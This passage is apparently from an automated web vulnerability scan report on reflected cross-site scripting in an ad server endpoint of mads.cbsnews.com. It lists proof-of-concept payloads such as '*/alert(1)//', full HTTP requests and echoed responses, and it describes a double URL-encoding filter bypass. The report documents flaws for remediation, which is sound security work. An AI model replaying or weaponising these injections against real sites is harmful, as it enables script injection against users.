/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=806c6da<a>a48d6ff9148&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80664869148' CNET-PTYPE='00' POS='100' NCAT='250:503544:' CNET-PARTNER-ID='1' DVAR_
...[SNIP]...

1.196. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into a JavaScript inline comment. The payload 68943*/alert(1)//59a571ec2f7 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=168943*/alert(1)//59a571ec2f7&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:07 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:07 GMT
Content-Length: 572

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=168943*/alert(1)//59a571ec2f7&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='16894315957127' SPECIFIED. BEACON CALL FAILED. */;window.CBSI_PAGESTATE='1||;cbsnews.com;;|-1';/* MAC [r20101202-0915-v1-13-13-JsonEnco
...[SNIP]...

1.197. http://mads.cbsnews.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1aa3'%3balert(1)//8fee192004 was submitted in the BRAND parameter. This input was echoed as b1aa3';alert(1)//8fee192004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b1aa3'%3balert(1)//8fee192004&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:49 GMT
Server: Apache/2.2
Content-Length: 1119
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:49 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b1aa3'%3balert(1)//8fee192004&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DV
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=14617&sg=1815&o=250%253a503544%253a&h=cn&p=2&b=55b1aa3';alert(1)//8fee192004&l=en_US&site=162&pt=8301&nd=503544&pid=&cid=20031629&pp=100&e=&rqid=01phx1-ad-e18:4D5842B347B577&orh=cbsnews.com&ort=&oepartner=&epartner=&ppart
...[SNIP]...

1.198. http://mads.cbsnews.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload b2ce6*/alert(1)//8b4283b85c0 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b2ce6*/alert(1)//8b4283b85c0&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:53 GMT
Server: Apache/2.2
Content-Length: 1118
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b2ce6*/alert(1)//8b4283b85c0&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

1.199. http://mads.cbsnews.com/mac-ad [CELT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 18e49<a>b9fc646e6 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js18e49<a>b9fc646e6&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:48 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:35:48 GMT
Content-Length: 521


...[SNIP]...

1.200. http://mads.cbsnews.com/mac-ad [CID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the CID request parameter is copied into a JavaScript inline comment. The payload ebef0*/alert(1)//0a018d77dd was submitted in the CID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629ebef0*/alert(1)//0a018d77dd&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:06 GMT
Server: Apache/2.2
Content-Length: 1113
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:06 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629ebef0*/alert(1)//0a018d77dd&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

1.201. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 7f73f*/alert(1)//b4ca9862b97 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US7f73f*/alert(1)//b4ca9862b97&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:03 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:03 GMT
Content-Length: 608

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US7f73f*/alert(1)//b4ca9862b97&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTAT
...[SNIP]...

1.202. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 9d43c<a>fd7ee7a98b4 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS9d43c<a>fd7ee7a98b4&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:52 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:36:52 GMT
Content-Length: 553

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS9d43c<a>fd7ee7a98b4&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1"
...[SNIP]...

1.203. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 59f48*/alert(1)//f3203b6ea8b was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS59f48*/alert(1)//f3203b6ea8b&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:45 GMT
Server: Apache/2.2
Content-Length: 1092
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:35:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS59f48*/alert(1)//f3203b6ea8b&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.wr
...[SNIP]...

1.204. http://mads.cbsnews.com/mac-ad [NCAT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload 62ddc*/alert(1)//5c07f31d8c0 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A62ddc*/alert(1)//5c07f31d8c0&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:25 GMT
Server: Apache/2.2
Content-Length: 1139
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:25 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A62ddc*/alert(1)//5c07f31d8c0&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

1.205. http://mads.cbsnews.com/mac-ad [NODE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 8af49*/alert(1)//09dcc35bef3 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=5035448af49*/alert(1)//09dcc35bef3&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:39 GMT
Server: Apache/2.2
Content-Length: 1114
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:39 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=5035448af49*/alert(1)//09dcc35bef3&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

1.206. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34 was submitted in the PAGESTATE parameter. This input was echoed as 420d4';alert(1)//5b6eccfcc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:21 GMT
Server: Apache/2.2
Content-Length: 1167
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PT
...[SNIP]...
den%252dUS&ucat_rsi=%2526&pg=&t=2011.02.14.01.36.21/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />');
;window.CBSI_PAGESTATE='420d4';alert(1)//5b6eccfcc34';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw5.cnet.com::1348606272 2011.02.14.01.36.21 *//* MAC T 0.0.3.3 */

1.207. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload d6a51*/alert(1)//c1e9cd45c17 was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=d6a51*/alert(1)//c1e9cd45c17&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:23 GMT
Server: Apache/2.2
Content-Length: 1122
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:23 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=d6a51*/alert(1)//c1e9cd45c17&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default a
...[SNIP]...

1.208. http://mads.cbsnews.com/mac-ad [POS parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload c0f65<a>1fc0f8dcd22 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100c0f65<a>1fc0f8dcd22&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:35 GMT
Content-Length: 599

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100c0f65<a>1fc0f8dcd22&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80' CNET-PTYPE='00' POS='100c0f65a1fc0f8dcd22' NCAT='250:503544:' CNET-PARTNER-ID='1' DVAR_
...[SNIP]...

1.209. http://mads.cbsnews.com/mac-ad [PTYPE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload 93353*/alert(1)//10a6db2e038 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=830193353*/alert(1)//10a6db2e038&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

